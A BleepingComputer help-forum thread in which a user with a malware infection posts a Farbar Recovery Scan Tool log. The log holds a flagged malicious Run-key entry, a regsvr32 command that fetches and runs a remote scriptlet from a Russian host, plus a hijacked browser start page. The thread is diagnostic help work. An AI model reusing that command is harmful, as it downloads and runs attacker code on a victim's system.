Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

I have a virus called Win32/Powermet.B!attk!!


  • This topic is locked This topic is locked
13 replies to this topic

#1 AbhaySolanki

AbhaySolanki

  • Members
  • 13 posts
  • OFFLINE
  •  

Posted 20 September 2017 - 12:47 AM

It infected my Steam and all its folder came on Desktop. I tried uninstalling it but all the other important stuff on my desktop got deleted and all that was left was the Steam folders.

 

 



BC AdBot (Login to Remove)

 


#2 AbhaySolanki

AbhaySolanki
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  

Posted 20 September 2017 - 12:50 AM

 
This is the first log.
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 19-09-2017
Ran by Abhay (administrator) on DESKTOP-PL742CC (20-09-2017 11:09:19)
Running from C:\Users\Admin\Downloads
Loaded Profiles: Abhay (Available Profiles: Abhay)
Platform: Windows 10 Enterprise (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Windows ® Win 7 DDK provider) C:\Windows\System32\AdminService.exe
(Intel Corporation) C:\Windows\System32\Intel\DPTF\esif_uf.exe
() C:\Windows\SysWOW64\PnkBstrB.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Synaptics Incorporated) C:\Windows\System32\valWBFPolicyService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Waves Audio Ltd.) C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Intel Corporation) C:\Windows\Temp\DPTF\esif_assist_64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
(Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Waves Audio Ltd.) C:\Program Files\Waves\MaxxAudio\WavesSvc64.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\NetworkUXBroker.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.6568.46361.0_x64__8wekyb3d8bbwe\HxMail.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.6568.46361.0_x64__8wekyb3d8bbwe\HxTsr.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [QuickSet] => C:\Program Files\Dell\QuickSet\QuickSet.exe [3926016 2016-05-26] (Dell Inc.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9080848 2017-08-05] (Realtek Semiconductor)
HKLM\...\Run: [WavesSvc] => c:\Program Files\Waves\MaxxAudio\WavesSvc64.exe [940976 2016-11-19] (Waves Audio Ltd.)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-07-22] (Oracle Corporation)
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\...\Run: [DAEMON Tools Lite] => C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [1305408 2011-01-20] (DT Soft Ltd)
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server1.aserdefa.ru/deploy.xml scrobj.dll <==== ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{47ae2bd7-5f3f-44d5-89a1-6cd567f1a52b}: [DhcpNameServer] 192.168.0.1
 
Internet Explorer:
==================
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.palikan.com/?f=1&a=plk_coinisre_17_30_ssg01&cd=2XzuyEtN2Y1L1Qzu0A0AyC0B0A0DyDtByB0DyE0FtA0Fzy0FtN0D0Tzu0StBtDtAtBtN1L2XzutAtFtByBtFyEtFyDtDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyBtCtBtBtD0CyEyEtGyDtD0A0FtGtA0F0A0AtGtDyDyB0EtGtCtCyCzyyBtA0B0C0B0DtD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyByByBtB0DyC0D0CtGzztD0FyDtGyE0FtBtAtGzzyCyB0DtGtCyC0AzyyD0FtCyBtBzzyE0F2QtN0A0LzuyE&cr=410628304&ir=
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_144\bin\ssv.dll [2017-08-05] (Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_144\bin\jp2ssv.dll [2017-08-05] (Oracle Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation)
 
FireFox:
========
FF DefaultProfile: 383lmmts.default
FF ProfilePath: C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\383lmmts.default [2017-09-18]
FF Plugin: @java.com/DTPlugin,version=11.144.2 -> C:\Program Files\Java\jre1.8.0_144\bin\dtplugin\npDeployJava1.dll [2017-08-05] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.144.2 -> C:\Program Files\Java\jre1.8.0_144\bin\plugin2\npjp2.dll [2017-08-05] (Oracle Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-05] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-08-05] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2017-08-18] (Adobe Systems Inc.)
 
Chrome:
=======
CHR Profile: C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default [2017-09-19]
CHR Extension: (Google Docs) - C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-08-05]
CHR Extension: (Google Drive) - C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-08-05]
CHR Extension: (YouTube) - C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-08-05]
CHR Extension: (Google Docs Offline) - C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-08-05]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-25]
CHR Extension: (Gmail) - C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-08-05]
CHR Extension: (Chrome Media Router) - C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-13]
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1530888 2017-07-29] ()
S3 cplspcon; C:\Windows\system32\IntelCpHDCPSvc.exe [480216 2017-08-05] (Intel Corporation)
R2 esifsvc; C:\Windows\system32\Intel\DPTF\esif_uf.exe [2223864 2017-08-05] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [341976 2017-08-05] (Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [987432 2016-06-15] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [215328 2016-07-19] (Intel Corporation)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [66872 2017-09-01] ()
R2 PnkBstrB; C:\Windows\SysWOW64\PnkBstrB.exe [103736 2017-09-01] ()
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [329736 2017-08-05] (Realtek Semiconductor)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [269920 2017-08-05] (Synaptics Incorporated)
R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [44544 2015-03-03] (Synaptics Incorporated) [File not signed]
R2 WavesSysSvc; c:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe [410032 2016-11-19] (Waves Audio Ltd.)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2016-10-25] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2017-06-03] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131712 2017-08-09] (Samsung Electronics Co., Ltd.)
R2 DpmLiteDrv; C:\Program Files\Dell\QuickSet\DpmLiteDrv64.sys [15080 2014-10-15] (Wistron Corp.)
R3 dptf_cpu; C:\Windows\System32\drivers\dptf_cpu.sys [75320 2017-08-05] (Intel Corporation)
R1 dtsoftbus01; C:\Windows\System32\drivers\dtsoftbus01.sys [254528 2017-08-05] (DT Soft Ltd)
R3 esif_lf; C:\Windows\System32\drivers\esif_lf.sys [358968 2017-08-05] (Intel Corporation)
R3 HidEventFilter; C:\Windows\System32\drivers\HidEventFilter.sys [63496 2017-08-05] (Intel Corporation)
R3 iaLPSS2_GPIO2; C:\Windows\System32\drivers\iaLPSS2_GPIO2.sys [98608 2017-08-05] (Intel Corporation)
R1 MpKsl8296ef7f; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{FAB4EBD9-F4D3-4E08-844A-6222FAE6FE2F}\MpKsl8296ef7f.sys [44928 2017-09-19] (Microsoft Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [955392 2017-08-05] (Realtek )
R3 RTSUER; C:\Windows\system32\Drivers\RtsUer.sys [436224 2017-08-05] (Realsil Semiconductor Corporation)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [165504 2017-08-09] (Samsung Electronics Co., Ltd.)
R3 SynRMIHID; C:\Windows\system32\DRIVERS\SynRMIHID.sys [74848 2017-08-05] (Synaptics Incorporated)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 

==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-09-20 11:09 - 2017-09-20 11:10 - 000012243 _____ C:\Users\Admin\Downloads\FRST.txt
2017-09-20 11:09 - 2017-09-20 11:09 - 000000000 ____D C:\FRST
2017-09-20 11:08 - 2017-09-20 11:08 - 002399744 _____ (Farbar) C:\Users\Admin\Downloads\FRST64.exe
2017-09-20 10:43 - 2017-09-20 10:43 - 000016148 _____ C:\Windows\system32\DESKTOP-PL742CC_Abhay_HistoryPrediction.bin
2017-09-18 19:24 - 2017-09-19 20:40 - 000000000 ____D C:\Users\Admin\Desktop\userdata
2017-09-18 19:22 - 2017-09-19 20:40 - 000000000 ____D C:\Users\Admin\Desktop\bin
2017-09-18 19:22 - 2017-09-18 19:22 - 000000000 ____D C:\Users\Admin\Desktop\tenfoot
2017-09-18 12:38 - 2017-09-18 12:38 - 000001933 _____ C:\Users\Admin\Downloads\Maze.java.zip
2017-09-13 14:29 - 2017-09-13 14:29 - 000054024 _____ C:\Users\Admin\Downloads\cur197.ani
2017-09-13 11:51 - 2017-09-15 12:23 - 000000079 _____ C:\Users\Admin\Desktop\email teacher.txt
2017-09-12 21:54 - 2017-09-12 21:54 - 000000000 ____D C:\Users\Admin\Documents\My Games
2017-09-12 21:54 - 2017-09-12 21:54 - 000000000 ____D C:\Users\Admin\AppData\Local\Skyrim
2017-09-12 21:53 - 2017-09-12 21:53 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Razor 1911
2017-09-09 12:48 - 2017-09-09 12:48 - 000000000 ___HD C:\OneDriveTemp
2017-09-08 21:04 - 2017-09-08 21:05 - 000134771 ____T C:\Windows\mndFC2C.diagerr.mdmp
2017-09-08 13:59 - 2017-09-08 13:59 - 000002012 _____ C:\Windows\SysWOW64\BrowserSettings.InstallState
2017-09-08 13:59 - 2017-09-08 13:59 - 000000000 ____D C:\Program Files (x86)\(n)Code Solutions
2017-09-08 13:57 - 2017-09-08 13:57 - 000489126 _____ C:\Users\Admin\Downloads\(n)Procure Tool.zip
2017-09-08 13:48 - 2017-09-20 10:18 - 000004166 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{2AC21A95-CAC6-4662-9E57-304212EA18A3}
2017-09-07 16:10 - 2017-09-09 13:10 - 000000000 ____D C:\Users\Admin\AppData\LocalLow\Daybreak Game Company
2017-09-07 16:10 - 2017-09-07 16:10 - 000000000 ____D C:\Users\Admin\AppData\Local\SCE
2017-09-07 16:10 - 2017-09-07 16:10 - 000000000 ____D C:\Users\Admin\AppData\Local\Daybreak Game Company
2017-09-01 23:54 - 2017-09-01 23:55 - 001518536 _____ (Badomehit ) C:\Users\Admin\Downloads\adobe_flash_setup_4186731414.exe
2017-09-01 20:30 - 2017-09-08 23:56 - 000000000 ____D C:\Users\Admin\Documents\Dungeons and Dragons Online
2017-09-01 20:30 - 2017-09-02 00:06 - 000000000 ____D C:\Users\Admin\AppData\Local\Turbine
2017-09-01 20:30 - 2017-09-01 20:30 - 000895276 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2017-09-01 20:29 - 2017-09-01 20:29 - 000000000 ____D C:\Windows\SysWOW64\URTTEMP
2017-08-31 11:05 - 2017-08-31 11:05 - 000000000 ____D C:\Users\Admin\AppData\Local\CallofDuty4MW
2017-08-31 11:01 - 2017-08-31 11:04 - 003282353 _____ C:\Users\Admin\Downloads\cod4x_client.zip
2017-08-31 10:47 - 2017-08-31 10:49 - 004515759 _____ C:\Users\Admin\Downloads\cod4mw_pb.zip
2017-08-30 13:02 - 2017-08-30 13:03 - 005782856 _____ C:\Users\Admin\Downloads\GTSetup-1.5.3.exe
2017-08-30 12:54 - 2017-08-30 12:54 - 004234744 _____ C:\Users\Admin\Downloads\COD4_pbfiles2014.rar
2017-08-29 12:23 - 2017-08-29 12:24 - 004504689 _____ C:\Users\Admin\Downloads\File_6409_-_gaacod4_win32.zip
2017-08-26 22:03 - 2017-08-27 11:11 - 000000000 ____D C:\Users\Admin\AppData\Local\Argo
2017-08-26 22:03 - 2017-08-26 22:03 - 000000000 ____D C:\ProgramData\Bohemia Interactive
2017-08-26 11:07 - 2017-08-26 11:08 - 003139984 _____ C:\Users\Admin\Downloads\servercache.dat
2017-08-26 11:04 - 2017-09-01 08:41 - 000103736 _____ C:\Windows\SysWOW64\PnkBstrB.exe
2017-08-26 11:04 - 2017-09-01 08:40 - 000066872 _____ C:\Windows\SysWOW64\PnkBstrA.exe
2017-08-25 21:54 - 2017-09-18 23:38 - 000000000 ____D C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-08-22 22:56 - 2017-08-22 22:56 - 000003160 _____ C:\Windows\System32\Tasks\StartCN
2017-08-22 22:56 - 2017-08-22 22:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2017-08-22 22:56 - 2017-08-22 22:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard
2017-08-22 22:54 - 2017-08-22 22:54 - 000000000 ____D C:\Program Files\Common Files\ATI Technologies
2017-08-22 22:45 - 2017-08-22 22:45 - 000000000 ____D C:\Users\Admin\AppData\Roaming\ATI
2017-08-22 22:45 - 2017-08-22 22:45 - 000000000 ____D C:\Users\Admin\AppData\Local\ATI
2017-08-22 22:45 - 2017-08-22 22:45 - 000000000 ____D C:\ProgramData\ATI
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-09-20 10:43 - 2015-07-10 16:34 - 000000000 ____D C:\Windows\AppReadiness
2017-09-19 20:11 - 2017-08-05 01:24 - 000003808 _____ C:\Windows\System32\Tasks\AutoKMS
2017-09-19 12:51 - 2015-07-10 16:34 - 000000000 ___HD C:\Program Files\WindowsApps
2017-09-18 19:37 - 2017-08-05 01:09 - 000887678 _____ C:\Windows\system32\PerfStringBackup.INI
2017-09-18 19:37 - 2015-07-10 16:32 - 000000000 ____D C:\Windows\INF
2017-09-18 19:32 - 2015-07-10 17:51 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2017-09-18 19:31 - 2015-07-10 14:35 - 000262144 ___SH C:\Windows\system32\config\BBI
2017-09-18 19:30 - 2017-08-05 01:04 - 000000000 ____D C:\Users\Admin
2017-09-18 12:55 - 2017-08-05 06:40 - 000000000 ____D C:\Users\Admin\AppData\LocalLow\Mozilla
2017-09-17 13:56 - 2017-08-05 01:27 - 000000000 ____D C:\Users\Admin\AppData\Roaming\vlc
2017-09-16 20:34 - 2017-08-05 01:56 - 000000000 ____D C:\Windows\Panther
2017-09-15 13:27 - 2015-07-10 16:34 - 000000000 ____D C:\Windows\LiveKernelReports
2017-09-13 14:39 - 2017-08-05 08:26 - 000000000 ____D C:\Windows\system32\MRT
2017-09-13 14:07 - 2017-08-05 08:26 - 138202976 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-09-13 14:01 - 2015-07-10 16:34 - 000000000 ____D C:\Windows\Cursors
2017-09-12 12:10 - 2017-07-11 13:09 - 000000000 ___HD C:\$WINDOWS.~BT
2017-09-09 16:02 - 2017-08-05 01:07 - 000000000 ___RD C:\Users\Admin\OneDrive
2017-09-09 12:47 - 2017-08-05 06:25 - 000003376 _____ C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1238717651-3256879073-989753507-1001
2017-09-09 12:47 - 2017-08-05 01:07 - 000002363 _____ C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-09-08 21:26 - 2017-08-05 11:06 - 000000000 ____D C:\Users\Admin\AppData\Roaming\obs-studio
2017-09-08 20:30 - 2017-08-05 23:47 - 000000000 ____D C:\Users\Admin\AppData\Local\Steam
2017-09-05 14:06 - 2015-07-10 16:34 - 000000000 ____D C:\Windows\rescache
2017-09-02 17:03 - 2017-08-05 01:27 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-09-02 17:03 - 2017-08-05 01:27 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-09-01 20:30 - 2015-07-10 16:34 - 000000000 ____D C:\Windows\Registration
2017-08-28 15:12 - 2017-08-05 01:06 - 000000420 _____ C:\Users\Admin\Desktop\This PC - Shortcut.lnk
2017-08-26 08:24 - 2017-08-05 01:27 - 000002272 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-08-22 23:00 - 2017-08-05 01:09 - 000000000 ____D C:\Users\Admin\AppData\Local\AMD
2017-08-22 22:56 - 2017-08-05 01:07 - 000000000 ____D C:\Program Files\AMD
2017-08-22 22:55 - 2017-08-05 01:09 - 000000000 ____D C:\Program Files (x86)\AMD
2017-08-22 22:53 - 2017-08-05 01:08 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2017-08-22 22:46 - 2017-08-05 01:07 - 000000000 ____D C:\ProgramData\Package Cache
 
==================== Files in the root of some directories =======
 
2017-08-14 11:38 - 2017-08-14 11:38 - 000000000 _____ () C:\Users\Admin\AppData\Local\{F74DEB18-5EAC-4E14-BC03-BB592F7DB538}
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-09-13 20:43
 
==================== End of FRST.txt ============================

 
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 19-09-2017
Ran by Abhay (20-09-2017 11:10:46)
Running from C:\Users\Admin\Downloads
Windows 10 Enterprise (X64) (2017-08-04 19:33:13)
Boot Mode: Normal
==========================================================
 

==================== Accounts: =============================
 
Abhay (S-1-5-21-1238717651-3256879073-989753507-1001 - Administrator - Enabled) => C:\Users\Admin
Administrator (S-1-5-21-1238717651-3256879073-989753507-500 - Administrator - Disabled)
ASPNET (S-1-5-21-1238717651-3256879073-989753507-1002 - Limited - Enabled)
DefaultAccount (S-1-5-21-1238717651-3256879073-989753507-503 - Limited - Disabled)
Guest (S-1-5-21-1238717651-3256879073-989753507-501 - Limited - Disabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
(n)Code Solutions - PKI Component (Ver 3.0.0) (HKLM-x32\...\{2D810C13-E97C-46EF-8707-2D9A1FDB8E65}) (Version: 3.0.0 - (n)Code Solutions)
Adobe Reader XI (11.0.22) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.22 - Adobe Systems Incorporated)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.)
BitTorrent (HKU\S-1-5-21-1238717651-3256879073-989753507-1001\...\BitTorrent) (Version: 7.10.0.43917 - BitTorrent Inc.)
Black Squad (HKLM\...\Steam App 550650) (Version:  - NS STUDIO)
Catalyst Control Center Next Localization BR (HKLM\...\{85EC2DC7-901A-C7A8-69CC-D14B5311C057}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{155ABE97-ABF9-EE58-3270-334EF950F3A9}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{44167DA6-B26A-A06B-213E-A481135FCBF0}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{ED204021-2012-F4F3-E495-F4AFD74D66FF}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{1D12B9AD-21F1-791A-6A85-47F27406282C}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{0101153A-CA07-4E2C-EF5E-D411604CF036}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{3BBAB5EA-62DA-2431-3A1F-3F89BBAE739D}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{975476BF-784B-0C34-09B3-AE6DC25C2B3C}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{2F028509-06B7-9869-5FD6-1F367A0B5827}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{8A5107B8-9CC4-141F-141D-B1952B84A62A}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{BFDF75E6-EBBE-FD30-7DED-A80A072A0452}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{665B0E99-0560-6850-876C-259CC785D49A}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{8191CEE4-C7AB-5A02-4587-9D12B6B443F2}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{E3D88B8D-BB11-D376-C3C6-EF7D0F8DD725}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{8831C53E-B6FA-3DE6-FB39-66BD5019F083}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{CB203E05-4AAA-9076-7D8B-5D7CAD7F0D39}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{4166E94C-7758-3D0E-1518-05BF181FBA21}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
